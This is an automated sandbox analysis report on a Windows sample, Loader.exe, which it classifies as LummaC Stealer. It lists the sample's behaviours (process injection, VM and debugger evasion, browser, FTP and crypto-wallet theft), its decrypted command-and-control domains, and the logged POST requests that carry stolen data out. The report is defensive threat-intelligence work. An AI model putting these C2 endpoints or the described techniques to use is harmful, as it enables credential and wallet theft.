Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1633709
MD5:62d09972bfc8e79a68fba0dae33980ca
SHA1:e41b0d005a22daaa9377dc2da9365f4d606eee44
SHA256:ffd1d2d2be886bb1e96fa1fc15b5f24cd66bd50ea15f9b542f63d371f52c839d
Tags:exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Loader.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 62D09972BFC8E79A68FBA0DAE33980CA)
    • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 62D09972BFC8E79A68FBA0DAE33980CA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2665491875.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
    00000002.00000003.1587677507.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000003.1620380906.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1620222186.0000000000D7A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.Loader.exe.400000.1.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              2.2.Loader.exe.400000.1.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-10T15:29:47.699077+010020283713Unknown Traffic192.168.2.549704149.154.167.99443TCP
                2025-03-10T15:29:49.776853+010020283713Unknown Traffic192.168.2.549705104.21.77.86443TCP
                2025-03-10T15:29:51.602881+010020283713Unknown Traffic192.168.2.549706104.21.77.86443TCP
                2025-03-10T15:29:55.606128+010020283713Unknown Traffic192.168.2.549707104.21.77.86443TCP
                2025-03-10T15:29:58.599894+010020283713Unknown Traffic192.168.2.549708104.21.77.86443TCP
                2025-03-10T15:30:01.719283+010020283713Unknown Traffic192.168.2.549711104.21.77.86443TCP
                2025-03-10T15:30:05.408546+010020283713Unknown Traffic192.168.2.549713104.21.77.86443TCP
                2025-03-10T15:30:09.314077+010020283713Unknown Traffic192.168.2.549715104.21.77.86443TCP
                2025-03-10T15:30:13.741882+010020283713Unknown Traffic192.168.2.549718104.21.77.86443TCP
                2025-03-10T15:30:15.878307+010020283713Unknown Traffic192.168.2.54971923.197.127.21443TCP
                2025-03-10T15:30:18.633101+010020283713Unknown Traffic192.168.2.549720188.114.96.3443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://fostinjec.today/LksNAzxAvira URL Cloud: Label: malware
                Source: https://astralconnec.icu/DPowko58sAvira URL Cloud: Label: malware
                Source: https://astralconnec.icu/DPowko$$Avira URL Cloud: Label: malware
                Source: https://sterpickced.digital/BAAvira URL Cloud: Label: malware
                Source: https://sterpickced.digital/Avira URL Cloud: Label: malware
                Source: https://modelshiverd.icu/bJhnsjAvira URL Cloud: Label: malware
                Source: https://astralconnec.icu/XAvira URL Cloud: Label: malware
                Source: https://astralconnec.icu:443/DPowkoAvira URL Cloud: Label: malware
                Source: https://catterjur.run/Avira URL Cloud: Label: malware
                Source: https://astralconnec.icu/YAvira URL Cloud: Label: malware
                Source: https://astralconnec.icu/DPowkoAvira URL Cloud: Label: malware
                Source: https://astralconnec.icu/aAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Loader.exeVirustotal: Detection: 32%Perma Link
                Source: Loader.exeReversingLabs: Detection: 28%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.2% probability
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString decryptor: astralconnec.icu/DPowko
                Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString decryptor: begindecafer.world/QwdZdf
                Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString decryptor: garagedrootz.top/oPsoJAN
                Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString decryptor: modelshiverd.icu/bJhnsj
                Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString decryptor: arisechairedd.shop/JnsHY
                Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString decryptor: catterjur.run/boSnzhu
                Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString decryptor: orangemyther.live/IozZ
                Source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString decryptor: fostinjec.today/LksNAz
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
                Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Loader.exeDirectory queried: number of queries: 1001
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0009DAAE FindFirstFileExW,0_2_0009DAAE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0009DB5F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0009DB5F
                Source: global trafficTCP traffic: 192.168.2.5:49800 -> 162.159.36.2:53
                Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
                Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
                Source: Joe Sandbox ViewIP Address: 23.197.127.21 23.197.127.21
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.77.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 149.154.167.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.77.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.77.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.77.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.77.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.21.77.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.77.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.77.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 23.197.127.21:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49720 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: astralconnec.icu
                Source: global trafficHTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XGUEFS079avesl74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14927Host: astralconnec.icu
                Source: global trafficHTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=xf1a009lpdHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15051Host: astralconnec.icu
                Source: global trafficHTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K72tmOiEcSmUP4cdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20565Host: astralconnec.icu
                Source: global trafficHTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=mkPacGgZ2hQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2329Host: astralconnec.icu
                Source: global trafficHTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=v1ZLA8TJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587743Host: astralconnec.icu
                Source: global trafficHTTP traffic detected: POST /aRIsjI HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: areawannte.bet
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me
                Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: astralconnec.icu
                Source: global trafficDNS traffic detected: DNS query: begindecafer.world
                Source: global trafficDNS traffic detected: DNS query: garagedrootz.top
                Source: global trafficDNS traffic detected: DNS query: modelshiverd.icu
                Source: global trafficDNS traffic detected: DNS query: arisechairedd.shop
                Source: global trafficDNS traffic detected: DNS query: catterjur.run
                Source: global trafficDNS traffic detected: DNS query: orangemyther.live
                Source: global trafficDNS traffic detected: DNS query: fostinjec.today
                Source: global trafficDNS traffic detected: DNS query: sterpickced.digital
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: areawannte.bet
                Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                Source: unknownHTTP traffic detected: POST /DPowko HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: astralconnec.icu
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Loader.exe, 00000002.00000003.1549686018.000000000348F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://areawannte.bet/
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://areawannte.bet/.
                Source: Loader.exe, Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244460225.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665667377.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665825514.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://areawannte.bet/aRIsjI
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://areawannte.bet/aRIsjIK
                Source: Loader.exe, 00000002.00000003.2244391216.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665753957.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544370381.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544255250.0000000000D7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://areawannte.bet:443/aRIsjIBBJ
                Source: Loader.exe, Loader.exe, 00000002.00000003.1549172470.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548196959.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1547865984.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1517179040.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1549172470.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1620489940.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548012881.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644894647.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1547865984.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548236273.0000000000E26000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1687913158.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1550008713.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548055136.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548286834.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644704569.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644668526.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1620015903.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://astralconnec.icu/DPowko
                Source: Loader.exe, 00000002.00000003.1687807478.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://astralconnec.icu/DPowko$$
                Source: Loader.exe, 00000002.00000003.1549172470.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548012881.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1547865984.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548055136.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1548286834.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://astralconnec.icu/DPowko58s
                Source: Loader.exe, 00000002.00000003.1620489940.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625967642.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1687913158.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://astralconnec.icu/X
                Source: Loader.exe, 00000002.00000003.1620489940.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625967642.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1687913158.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://astralconnec.icu/Y
                Source: Loader.exe, 00000002.00000003.1620489940.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625967642.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://astralconnec.icu/a
                Source: Loader.exe, 00000002.00000003.1687913158.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://astralconnec.icu/s
                Source: Loader.exe, 00000002.00000003.1579252363.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644704569.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1644668526.0000000000E2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://astralconnec.icu:443/DPowko
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://catterjur.run/
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
